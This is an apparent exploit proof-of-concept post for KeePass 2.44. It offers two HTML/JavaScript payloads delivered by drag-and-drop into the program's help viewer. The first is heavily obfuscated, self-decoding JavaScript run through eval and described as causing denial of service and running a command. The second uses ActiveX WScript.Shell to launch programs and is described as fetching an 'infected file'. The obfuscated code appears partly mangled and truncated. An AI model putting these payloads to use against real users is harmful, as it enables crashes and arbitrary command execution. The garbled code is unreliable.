KeePass 2.44 – Denial of Service (PoC)

# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
# Product : KeePass Password Safe
# Version :  Help > About KeePass > Help (any local help area) >
Drag&Drop HTML File

Save the contents to html.


Payload-1:
(DoS & Run Cmd)


//< ![CDATA[
=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(")"function f(x,y){var i,o="\""+
"\,l=x.length;for(i=0;i<l ;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
"e(x.charCodeAt(i)^(y++));}return o;}f("\xr}jMDLW\\nRTN\\"+
"\LFE\\004\\017\\022GD\\\\^\\rhGjYh" +
"83#9y2/(-s:\\021\\024\\013\\025Y9D\\037E\"+
"34\\013F\\017\\002\\003\\037\\021\"+
"\005\\033\\021\\030\\020*UX\\032\\02" +
"5\\025\\010\\030\\020t$>;p=3=3 70=d\"+
"06y\\n\\037\\r\\036\\006\" +
"33\\035\\033\\021WXYZ'\\016!\\020 !\\"+
""\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\017IVNH\\033\\004"+
"\16\\023\\031\\021"\,28)"(f};)lo,0(rtsbus." +
"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,""=o,i rav{)x(f noitcnuf""+
")"                                                                           ;
while(x=eval(x));
//-->
//]]>


//< ![CDATA[
=0;i--){o+=x.charAt(i);}return o" +
".substr(0,ol);}f(")19,"ZPdw771\b77-0xjk-7=3771\sp,cw$520\:330"+
"xg030\jj9%530\b000\XZUUVX620\LP\\Pr\610\KOHD400" +
"620\720\\\WOWGPr\530\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
"30\t\ 520\&310\$n\200\)230\/000\-K530\310\310" +
"\n\630\010\IULFW620\600\400\700\520\=*100\(70" +
"0\4500\*310\-u}xy8pt~}|{771\itg/e771\sb|`V620\530\NT" +
"\MdYjGh010\@TVI[O410\620\n\330\ZB@CQA200\SAijArGhEec" +
"J{HaN*2S?9t)V)5,&waedtbn\!010\'420\%n\+r\U]XY030\PT^]\" +
"\[ZY]GZEr\CYQ@b~4|);/pw$:2'610\?410\=220\vn720\h520\hz" +
"f7!%$4"\730\L\\JOfWdEjN420\230\230\IU710\@BE_IG]" +
"AHyV771\430\300\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\410\!B7" +
"30\330\430\020\K030\)600\/L530\530\330\600\QN" +
"C400\500\r\320\710\720\320\M620\710\500\2+>3?" +
""(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
";l
//]]>




Payload-2:
(run iexplorer.exe & download infected file)



function exec(cmdline, params) {
  var fso = new ActiveXObject("Scripting.FileSystemObject");
  fileExist = fso.FileExists(cmdline);
  if (!fileExist) {
    alert("The requested application is not installed.");
  }
  else {
    var shell = new ActiveXObject( "WScript.Shell" );
    if (params) {
        params = ' ' + params;
    }
    else {
        params = '';
    }
    shell.Run('"' + cmdline + '"' + params);
  }
}

Edition Mode Active
 
            

Comments are closed.